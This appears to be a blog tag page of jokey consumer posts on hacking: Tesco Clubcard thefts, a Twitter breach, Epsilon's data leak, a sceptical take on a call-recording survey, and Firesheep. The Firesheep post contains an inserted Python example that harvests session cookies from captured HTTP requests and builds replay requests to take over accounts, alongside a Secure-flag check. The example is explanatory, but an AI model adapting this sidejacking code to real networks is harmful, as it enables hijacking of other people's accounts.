Posts Tagged ‘hacking’

It’s pretty creepy that Tesco use the Clubcard scheme to send targeted mail about Tena Lady and vodka (or is that just me?). But even creepier, now it seems your points might not be safe.

Today it was revealed that internet scamps have been hacking into Clubcard accounts to steal points off unsuspecting customers. Tesco and the police are investigating, and appealing for those who have been affected to get in touch.

According to Tesco the number of customers affected is ‘significantly less than 100.’ But those who’ve been hacked have been reporting login issues, and some Clubcard members have been informed that the vouchers were spent miles away from their home. Some poor sap on the Tesco site complained:
‘We logged on this month to find that £160 of vouchers that we were hoping to use at Christmas had been stolen from our Clubcard account. It had been spent in two stores in London, miles away from where we live.’

So if you see anyone in the er… London branch of Tesco wearing a balaclava and pushing a trolley full of someone else’s Christmas presents, give them what’s known in the trade as ‘an unexpected item in the bagging area’.

Oops – if you’re a Twitter user, there’s a chance that online baddies might have hacked into your account and nicked some of your info.

About 250,000 users of the wildly popular social media phenomenon have had their accounts hacked, in a move that has been described as ‘not the work of amateurs’ by the company’s info security lord, Bob Lord.

The plot thickens – Twitter has said that they will email anyone who they suspect has been hacked, but this in itself will give rise to a rash of phishing attempts, as other hackers try to disguise their fiendish works as Twitter emails, leading to further hackery and evil-doings.

In short, don’t click on a link in an email that asks you to change your password, however genuine it looks. Instead, head straight for the site in question yourself (type the address in, or use a bookmark) and change it there. Clicking on links in emails = bad times.

Yesterday we reported on the massive security breach at Epsilon, an online marketing firm, that affected some of the world’s biggest brands. But while the Texas-based company and the majority of the businesses are US-based, we’re hearing about a lot of avid Bitterwallet readers in the UK who have been affected.

Readers Kiara and Jade received warnings from Benefit Cosmetics, while Chris had received an email from TiVo that stated his email address had been exposed – even though Chris has never had any contact with or passed his details onto TiVo.

This morning, more companies have admitted Epsilon has lost their customer data, which is predominantly used for email newsletters and marketing; reader Chris avidly informed us of another email he received today from Best Buy, saying “files containing the email addresses of some Best Buy customers were accessed without authorization.”

Meanwhile readers Simon, Damien and Katy have all heard from Hilton Worldwide – “Epsilon has stressed that the only information accessed was names and e-mail addresses.”

As we mentioned yesterday, it’s hardly the stuff of apocalypses, more a guarantee that your details will be folded into some überdatabase and result in phishing attempts and offers to make her “gush like a blowhole all night long” until the end of time.

WARNING! All sites that send your logged-in session over plain, unencrypted HTTP (including Facebook, Twitter, Foursquare and loads of other very popular web destinations) have an underbelly softer than a mouse’s ear.

A developer called Eric Butler has decided to expose it for us all to see with his new Firefox extension, Firesheep, which passively listens to any open (unencrypted) Wi-Fi network and captures the session cookies of everyone using it.

Butler explains: “As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed.”

All you have to do is double click in the window which shows a person’s details and you’ll be logged into that site as that user. Firesheep never sees their password; it doesn’t need to, because the site accepts the stolen cookie as proof of who they are.

So basically, any time you use an open Wi-Fi connection, there’s now a good chance that someone can access some of your most private, personal information and correspondence (start deleting your dirty direct messages now, eh?).

Basically, once you log in, a site keeps track of you through a session cookie, which your browser sends along with every request. If the site uses plain HTTP rather than HTTPS, that cookie crosses the network in the clear. Firesheep grabs these cookies and lets someone else present them to the site and be treated as you. Astonishing stuff really.

If you’re not particularly worried about someone mucking around with your social networking profiles, then maybe you’ll be more concerned about the fact that this extension can also work with things like Amazon and WordPress. And that’s just with the site ‘handlers’ it ships with. If you’re savvy enough, you can write your own plugins and start hacking away at other stuff.
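The sniff-then-replay loop the paragraphs above describe, as an added example that is not part of the original post or of Firesheep’s own code. It parses a few constructed HTTP request captures (not real traffic), picks out the session cookies for the hosts in a small illustrative handler table (the host names and cookie names are made up for the example), builds the request an attacker would replay, and ends with the site-side check that would have stopped the whole thing: whether a Set-Cookie header carries the Secure attribute.

```python
"""Firesheep-style session sidejacking, reduced to its essentials.

On an open Wi-Fi network every unencrypted HTTP request is visible to
everyone else on the network. Firesheep does three things with that:
sniff, pick out the session cookie for sites it has a 'handler' for,
and replay that cookie. This example does the same on constructed
request captures. Nothing here was sniffed from a real network.
"""
from dataclasses import dataclass, field

# Illustrative handler table, in the spirit of Firesheep's per-site
# handlers: which cookie names carry the login session for each host.
# Hosts and cookie names are made up for this example (assumption).
HANDLERS = {
    "www.example-social.test": ["sess_id", "auth_token"],
    "blog.example.test": ["wordpress_logged_in"],
}

# Constructed captures: the TCP payload of one HTTP request each, as an
# eavesdropper on an open network would see them.
CAPTURES = [
    b"GET /home HTTP/1.1\r\nHost: www.example-social.test\r\n"
    b"Cookie: locale=en; sess_id=9f2c1a; auth_token=ab12cd; ads=1\r\n"
    b"User-Agent: Mozilla/5.0\r\n\r\n",
    # Same site, but this user is not logged in: only a tracking cookie.
    b"GET /public HTTP/1.1\r\nHost: www.example-social.test\r\n"
    b"Cookie: locale=en; ads=1\r\n\r\n",
    # A host with no handler: a cookie is there, but we do not know
    # which one is the session, so it is ignored (you would write a plugin).
    b"GET / HTTP/1.1\r\nHost: unknown.test\r\nCookie: id=42\r\n\r\n",
    b"POST /wp-admin/post.php HTTP/1.1\r\nHost: blog.example.test\r\n"
    b"Cookie: wordpress_logged_in=alice%7Cdeadbeef\r\n"
    b"Content-Length: 0\r\n\r\n",
]


@dataclass
class Session:
    host: str
    cookies: dict = field(default_factory=dict)


def parse_request(payload: bytes) -> dict:
    """Split one HTTP/1.x request into its request line and headers.

    Header names are lower-cased so lookups are case-insensitive, as
    HTTP requires.
    """
    head = payload.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def parse_cookies(header: str) -> dict:
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    cookies = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


def harvest_sessions(captures) -> list:
    """One Session per request that carries a complete login for a known host."""
    sessions = []
    for payload in captures:
        req = parse_request(payload)
        host = req["headers"].get("host", "")
        wanted = HANDLERS.get(host)
        if not wanted:
            continue
        jar = parse_cookies(req["headers"].get("cookie", ""))
        if all(name in jar for name in wanted):
            sessions.append(Session(host, {n: jar[n] for n in wanted}))
    return sessions


def replay_request(session: Session, path: str = "/") -> bytes:
    """Build the request an attacker sends to ride the stolen session.

    No password is involved: the site treats whoever presents the
    cookie as the logged-in user.
    """
    cookie = "; ".join(f"{n}={v}" for n, v in session.cookies.items())
    return (f"GET {path} HTTP/1.1\r\nHost: {session.host}\r\n"
            f"Cookie: {cookie}\r\n\r\n").encode()


def cookie_exposed_over_http(set_cookie: str) -> bool:
    """Site-side check: a cookie set without the Secure attribute is
    sent by the browser over plain http:// as well, which is exactly
    what a sidejacker needs. True means the cookie is exposed."""
    attrs = [p.strip().lower() for p in set_cookie.split(";")[1:]]
    return "secure" not in attrs


if __name__ == "__main__":
    for s in harvest_sessions(CAPTURES):
        print(f"{s.host}: {s.cookies}")
        print(replay_request(s, "/messages").decode())
    print(cookie_exposed_over_http("sess_id=9f2c1a; Path=/; HttpOnly"))
```

Of the four captures only two yield a usable session: the logged-out user and the unknown host are skipped. The last function is the one site operators should care about: serve the whole session over HTTPS and set Secure (and HttpOnly) on the cookie, and the browser will never put it on the wire in the clear, so there is nothing for Firesheep to grab.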

Butler says that he created this unsavoury tool to expose the lack of security on the web.

“Websites have a responsibility to protect the people who depend on their services. They’ve been ignoring this responsibility for too long, and it’s time for everyone to demand a more secure web. My hope is that Firesheep will help the users win,” Butler says.

As a user there’s not much you can do to stop a site sending your cookie in the clear; the real fix belongs with the site, which has to serve the whole logged-in session over HTTPS and mark the cookie Secure so the browser never sends it over plain HTTP. Until that happens, the lesson is that you shouldn’t log in on an open network (unless you use a VPN), as it leaves you wide open for someone to start delving into your private data.

According to a new survey by a company that has plenty to gain from the results, businesses are potentially exposing their customers to data theft by failing to erase recorded calls containing personal data and credit card information.

The survey by Veritape, which sells business software for recording phone calls in call centres – no interest at all in the results of their own survey, then – claims just three per cent of UK call centres comply with industry guidelines; the other 97 per cent store unedited customer calls. Fewer than four in ten businesses were aware of the Payment Card Industry rules, which forbid keeping sensitive authentication data such as the three-digit security code once a transaction has been authorised.

Veritape say it is “relatively straightforward” for a hacker to data mine these call recordings, and that “successful hacking incidents are rising steadily.” Everyone else who has blindly reproduced their findings seems to agree with the assessment, even though it appears journalists have simply cut and pasted the details. The Times, for example:

Oh. Right. The thing is, we’re struggling to find any notable examples of fraud committed in this way. Despite the claimed ease, we can’t find a single incident of recorded phone conversations being stolen remotely and the data within used to commit credit card fraud. The Telegraph publishes some figures, but these are generic figures that refer to “phone, internet and mail order fraud” rather than to capturing data through the very specific method that the entire story rests on. We’re not saying it hasn’t happened; we’re just unsure why an increasingly popular and “relatively straightforward” method of stealing credit card information hasn’t led to several high profile news stories, besides those that appeared today repeating the claims of a survey conducted by a company with a vested interest in the outcome.

Of course it’s not acceptable for call centres to store personal data on the sly, but it’s somewhat difficult to ascertain whether this scaremongering PR exercise highlights any genuine threat to consumers. In the same way that writing your online banking passwords on a slip of paper in Urdu and hiding it under the floorboards potentially puts your finances at risk from burglars, there is a possibility your recorded phone calls could be hacked – but the problem appears far less significant than anyone, either the company looking to line their pockets or the newspapers desperate to fill their pages, would have you believe.

UPDATED 17/10: The Times has amended their description of Veritape for the print version of the story:

Thereby proving they didn’t simply shamelessly cut and paste from the original press release. The new version of the story also now attempts to justify Veritape’s claims:

“Veritape says that “data mining” of audio recordings — when criminals hack into the recordings — is relatively straightforward and has occurred in at least one UK bank in the past 12 months.”

So despite the implication by Veritape that this is an increasingly common problem, they have one example of it occurring at one company in the whole country, in a year. That’s one incident, despite thousands of companies using call centres to deal with millions of customer transactions every day – and there’s still no detail of which company it was, when it occurred, how many customers were affected or indeed any other facts concerning the matter.

If your aim is to panic the public (to quote Veritape in the press, “this practice ought to send a shiver up the spine of card providers”) it’s pretty important to have a case study to prove your point, whether you’re the company pushing the research or the media reproducing it as news.